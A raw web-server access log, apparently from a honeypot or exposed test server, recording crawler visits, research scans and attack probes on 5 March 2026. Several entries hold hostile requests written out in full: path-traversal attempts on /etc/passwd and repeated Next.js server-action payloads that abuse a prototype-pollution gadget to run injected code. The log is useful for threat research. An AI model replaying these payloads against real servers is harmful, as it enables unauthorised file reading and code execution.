Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 47.254.76.66:25850
Path: /
URL: /
Method: GET
[2026-03-05 11:22:38] === HTTP Request ===
[2026-03-05 11:22:37] Main page accessed - IP: 123.160.223.75:8880
===================
Pragma: no-cache
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Cache-Control: no-cache
Accept-Language: en;q=0.9
Accept-Encoding: gzip
Sec-Fetch-Dest: document
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 123.160.223.75:8880
Path: /
URL: /
Method: GET
[2026-03-05 11:22:37] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 111.7.96.184:10894
Path: /v2/_catalog
URL: /v2/_catalog
Method: GET
[2026-03-05 11:15:19] === HTTP Request ===
[2026-03-05 11:06:09] Main page accessed - IP: 207.90.244.27:49446
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.27:49446
Path: /
URL: /
Method: GET
[2026-03-05 11:06:09] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.215:35216
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-05 11:05:53] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +``https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.103:41394
Path: /auth/login/sentry/
URL: /auth/login/sentry/
Method: GET
[2026-03-05 11:01:54] === HTTP Request ===
[2026-03-05 10:01:34] Main page accessed - IP: 121.40.40.84:42176
===================
Accept-Language: zh-CN,zh;q=0.8
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.40.40.84:42176
Path: /
URL: /
Method: GET
[2026-03-05 10:01:34] === HTTP Request ===
===================
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.175.185
Via: 2.0 Caddy
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55166
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-05 09:55:07] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.181.190.188:38482
Path: //etc/passwd
URL: //etc/passwd
Method: GET
[2026-03-05 09:31:32] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.181.190.188:38480
Path: /../../../../../../../../../../etc/passwd
URL: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Method: GET
[2026-03-05 09:31:32] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.181.190.188:38472
Path: /etc/passwd
URL: /etc/passwd
Method: GET
[2026-03-05 09:31:32] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.181.190.188:38464
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-05 09:31:32] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.181.190.188:38468
Path: /..\..\..\..\..\..\etc\passwd
URL: /..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
Method: GET
[2026-03-05 09:31:32] === HTTP Request ===
[2026-03-05 08:58:38] Main page accessed - IP: 138.226.237.101:53922
===================
Body: {"hehe:":ppp"}
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
Accept: */*
User-Agent: curl/7.76.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 138.226.237.101:53922
Path: /
URL: /
Method: POST
[2026-03-05 08:58:38] === HTTP Request ===
[2026-03-05 08:58:38] Main page accessed - IP: 138.226.237.101:53920
===================
Accept: */*
User-Agent: curl/7.76.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 138.226.237.101:53920
Path: /
URL: /
Method: HEAD
[2026-03-05 08:58:38] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Platform: "Linux"
Connection: keep-alive
Sec-Fetch-User: ?1
Referer: http://95.143.191.38:8081/
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Fetch-Dest: document
Sec-Gpc: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 134.209.241.160:50564
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-05 08:40:52] === HTTP Request ===
[2026-03-05 08:40:51] Main page accessed - IP: 134.209.241.160:50550
===================
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.5
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua-Mobile: ?0
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 134.209.241.160:50550
Path: /
URL: /
Method: GET
[2026-03-05 08:40:51] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:50146
Path: /jars
URL: /jars
Method: GET
[2026-03-05 08:35:49] === HTTP Request ===
[2026-03-05 08:00:09] Main page accessed - IP: 176.65.149.45:48448
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:48448
Path: /
URL: /
Method: GET
[2026-03-05 08:00:09] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.196.152.50:59017
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-05 07:35:53] === HTTP Request ===
[2026-03-05 07:32:32] Main page accessed - IP: 91.196.152.40:57825
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.196.152.40:57825
Path: /
URL: /
Method: GET
[2026-03-05 07:32:32] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.230.168.99:34571
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-05 05:35:59] === HTTP Request ===
[2026-03-05 05:30:36] Main page accessed - IP: 195.184.76.151:59017
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.184.76.151:59017
Path: /
URL: /
Method: GET
[2026-03-05 05:30:36] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32950
Path: /baseR5/metadata
URL: /baseR5/metadata
Method: GET
[2026-03-05 05:07:48] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:33022
Path: /fhir-server/api/v4/metadata
URL: /fhir-server/api/v4/metadata
Method: GET
[2026-03-05 05:07:29] === HTTP Request ===
===================
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Content-Type: application/fhir+json
Accept: application/fhir+json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32988
Path: /r4/metadata
URL: /r4/metadata
Method: GET
[2026-03-05 05:07:29] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:33038
Path: /v1/uscore/R4/metadata
URL: /v1/uscore/R4/metadata
Method: GET
[2026-03-05 05:07:29] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32980
Path: /r5/metadata
URL: /r5/metadata
Method: GET
[2026-03-05 05:07:29] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32934
Path: /baseR4/metadata
URL: /baseR4/metadata
Method: GET
[2026-03-05 05:07:29] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:33040
Path: /fhir/r4/metadata
URL: /fhir/r4/metadata
Method: GET
[2026-03-05 05:07:29] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32976
Path: /baseR3/metadata
URL: /baseR3/metadata
Method: GET
[2026-03-05 05:07:29] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:33014
Path: /baseDstu2/metadata
URL: /baseDstu2/metadata
Method: GET
[2026-03-05 05:07:29] === HTTP Request ===
===================
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Content-Type: application/fhir+json
Accept: application/fhir+json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32920
Path: /metadata
URL: /metadata
Method: GET
[2026-03-05 05:07:29] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32966
Path: /baseR2/metadata
URL: /baseR2/metadata
Method: GET
[2026-03-05 05:07:29] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:33006
Path: /r2/metadata
URL: /r2/metadata
Method: GET
[2026-03-05 05:07:29] === HTTP Request ===
===================
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Content-Type: application/fhir+json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32992
Path: /r3/metadata
URL: /r3/metadata
Method: GET
[2026-03-05 05:07:28] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:33018
Path: /baseDstu3/metadata
URL: /baseDstu3/metadata
Method: GET
[2026-03-05 05:07:28] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32906
Path: /fhir/metadata
URL: /fhir/metadata
Method: GET
[2026-03-05 05:07:28] === HTTP Request ===
===================
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Content-Type: application/fhir+json
Accept: application/fhir+json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32904
Path: /fhir/r4/metadata
URL: /fhir/r4/metadata
Method: GET
[2026-03-05 05:07:25] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32904
Path: /v1/uscore/R4/metadata
URL: /v1/uscore/R4/metadata
Method: GET
[2026-03-05 05:07:25] === HTTP Request ===
===================
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Content-Type: application/fhir+json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32904
Path: /fhir-server/api/v4/metadata
URL: /fhir-server/api/v4/metadata
Method: GET
[2026-03-05 05:07:25] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32904
Path: /baseDstu3/metadata
URL: /baseDstu3/metadata
Method: GET
[2026-03-05 05:07:25] === HTTP Request ===
===================
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Content-Type: application/fhir+json
Accept: application/fhir+json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32904
Path: /baseDstu2/metadata
URL: /baseDstu2/metadata
Method: GET
[2026-03-05 05:07:25] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32904
Path: /r2/metadata
URL: /r2/metadata
Method: GET
[2026-03-05 05:07:25] === HTTP Request ===
===================
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Content-Type: application/fhir+json
Accept: application/fhir+json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32904
Path: /r3/metadata
URL: /r3/metadata
Method: GET
[2026-03-05 05:07:25] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32904
Path: /r4/metadata
URL: /r4/metadata
Method: GET
[2026-03-05 05:07:25] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32904
Path: /r5/metadata
URL: /r5/metadata
Method: GET
[2026-03-05 05:07:25] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32904
Path: /baseR3/metadata
URL: /baseR3/metadata
Method: GET
[2026-03-05 05:07:25] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32904
Path: /baseR2/metadata
URL: /baseR2/metadata
Method: GET
[2026-03-05 05:07:25] === HTTP Request ===
===================
Connection: keep-alive
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32904
Path: /baseR5/metadata
URL: /baseR5/metadata
Method: GET
[2026-03-05 05:07:25] === HTTP Request ===
===================
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Content-Type: application/fhir+json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32904
Path: /baseR4/metadata
URL: /baseR4/metadata
Method: GET
[2026-03-05 05:07:25] === HTTP Request ===
===================
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32904
Path: /metadata
URL: /metadata
Method: GET
[2026-03-05 05:07:25] === HTTP Request ===
===================
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Connection: keep-alive
Content-Type: application/fhir+json
Accept: application/fhir+json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32904
Path: /fhir/metadata
URL: /fhir/metadata
Method: GET
[2026-03-05 05:07:25] === HTTP Request ===
===================
Connection: keep-alive
Content-Type: application/fhir+json
Accept: application/fhir+json
User-Agent: fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.174.89.19:32904
Path: /fhirproxy/api/fhir/r4/metadata
URL: /fhirproxy/api/fhir/r4/metadata
Method: GET
[2026-03-05 05:07:25] === HTTP Request ===
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.211:53761
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-05 05:01:19] === HTTP Request ===
[2026-03-05 05:01:19] Main page accessed - IP: 104.152.52.211:35643
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.211:35643
Path: /
URL: /
Method: GET
[2026-03-05 05:01:19] === HTTP Request ===
===================
------WebKitFormBoundaryx75957162085--
------WebKitFormBoundaryx75957162085
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx75957162085
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 33603+true+2260428;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx75957162085
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
X-Nextjs-Html-Request-Id: ilovepoop_75957162085
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx75957162085
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 513
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:46852
Path: /api/route
URL: /api/route
Method: POST
[2026-03-05 04:24:05] === HTTP Request ===
===================
------WebKitFormBoundaryx579880334883--
------WebKitFormBoundaryx579880334883
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx579880334883
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 308149+true+1881818;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx579880334883
X-Nextjs-Html-Request-Id: ilovepoop_579880334883
Next-Action: x
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Content-Length: 518
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx579880334883
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:46850
Path: /app
URL: /app
Method: POST
[2026-03-05 04:24:05] === HTTP Request ===
===================
------WebKitFormBoundaryx417828141794--
------WebKitFormBoundaryx417828141794
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx417828141794
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 323591+true+1291223;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx417828141794
X-Nextjs-Html-Request-Id: ilovepoop_417828141794
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Connection: close
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx417828141794
Next-Action: x
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:46836
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-05 04:24:05] === HTTP Request ===
===================
------WebKitFormBoundaryx2362527580001--
------WebKitFormBoundaryx2362527580001
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2362527580001
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 279200+true+8461775;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2362527580001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
X-Nextjs-Html-Request-Id: ilovepoop_2362527580001
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2362527580001
Connection: close
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:46834
Path: /api
URL: /api
Method: POST
[2026-03-05 04:24:04] === HTTP Request ===
===================
------WebKitFormBoundaryx659934194281--
------WebKitFormBoundaryx659934194281
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx659934194281
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 108785+true+6066408;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx659934194281
X-Nextjs-Html-Request-Id: ilovepoop_659934194281
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx659934194281
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Next-Action: x
Connection: close
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:46826
Path: /_next
URL: /_next
Method: POST
[2026-03-05 04:24:04] === HTTP Request ===
[2026-03-05 04:24:04] Main page accessed - IP: 195.3.221.86:46812
===================
------WebKitFormBoundaryx113693094041--
------WebKitFormBoundaryx113693094041
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx113693094041
